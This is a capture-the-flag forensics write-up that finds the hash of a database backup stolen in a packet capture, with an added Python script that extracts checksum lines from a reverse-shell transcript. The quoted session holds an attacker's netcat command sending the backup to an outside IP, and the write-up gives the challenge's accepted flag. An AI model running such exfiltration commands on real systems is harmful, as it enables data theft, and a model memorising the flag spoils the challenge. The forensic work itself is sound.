SHAshank Redemption

Challenge:

There is some internal back-and-forth at ESU regarding which file was exfiltrated by DEADFACE. They've asked us to determine "the hash of the file". When asked what kind of hash, they responded "It doesn't matter - anything so that we can verify the integrity of the data stolen". See if you can find a hash for the file stolen by DEADFACE within the packet capture.

Submit the flag as flag{hash}.

Use the packet capture from Scans.

Solution:

We know from The Root of All Evil challenge that there was a remote shell session with root privileges, TCP stream #5054. By following that stream in Wireshark we found the name of the exfiltrated file as well as the SHA-1 hash the attacker generated:

root@esu-web-7734:/backups# nc 165.227.73.138 13123 < backup_esu_20220727145001.sql.gz

<227.73.138 13123 < backup_esu_20220727145001.sql.gz
root@esu-web-7734:/backups# sha1sum backup_esu_20220727145001.sql.gz
sha1sum backup_esu_20220727145001.sql.gz
334a3d4f976cdf39d49b860afda77d6ac0f8a3c6  backup_esu_20220727145001.sql.gz

The accepted flag was: flag{334a3d4f976cdf39d49b860afda77d6ac0f8a3c6}
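As an added example (not part of the original write-up), the script below pulls checksum lines out of a followed-stream transcript like the one above and checks a carved copy of the file against the attacker's own hash. The embedded transcript is a constructed copy of the session; the tshark command in the comment is the usual way to dump stream 5054 as text.

```python
"""Extract integrity hashes from a reverse-shell session and verify a carved file.

The transcript below is a constructed stand-in for what "Follow TCP Stream"
(or `tshark -r capture.pcap -q -z follow,tcp,ascii,5054`) shows for a reverse
shell: the remote side echoes each command, so lines appear twice and a
partial echo such as "<227.73.138 ..." is normal. Only the digest line matters.
"""
import hashlib
import re

# Constructed sample of followed stream 5054 (mirrors the write-up's session).
STREAM_5054 = """root@esu-web-7734:/backups# nc 165.227.73.138 13123 < backup_esu_20220727145001.sql.gz
<227.73.138 13123 < backup_esu_20220727145001.sql.gz
root@esu-web-7734:/backups# sha1sum backup_esu_20220727145001.sql.gz
sha1sum backup_esu_20220727145001.sql.gz
334a3d4f976cdf39d49b860afda77d6ac0f8a3c6  backup_esu_20220727145001.sql.gz
"""

# md5sum/sha1sum/sha256sum output: <hex digest> followed by "  path" or " *path".
DIGEST_LINE = re.compile(
    r"^(?P<digest>[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})\s[ *](?P<path>\S+)\s*$"
)
DIGEST_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}


def extract_digests(stream_text):
    """Return {path: (algorithm, digest)} for every checksum line in the stream.

    Prompt lines, echoed commands and the truncated "<227..." echo do not match
    the digest pattern and are skipped, so the noise of a reverse shell is ignored.
    """
    found = {}
    for line in stream_text.splitlines():
        m = DIGEST_LINE.match(line.strip())
        if m:
            digest = m.group("digest")
            found[m.group("path")] = (DIGEST_ALGO[len(digest)], digest)
    return found


def verify_carved_file(data, algorithm, expected_digest):
    """True if bytes carved from the capture match the digest the attacker printed."""
    return hashlib.new(algorithm, data).hexdigest() == expected_digest.lower()


if __name__ == "__main__":
    for path, (algorithm, digest) in extract_digests(STREAM_5054).items():
        print(f"{path}: {algorithm} {digest} -> flag{{{digest}}}")
```

Because the digest pattern keys on the output format rather than the command name, the same extractor also picks up md5sum and sha256sum lines from other sessions.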
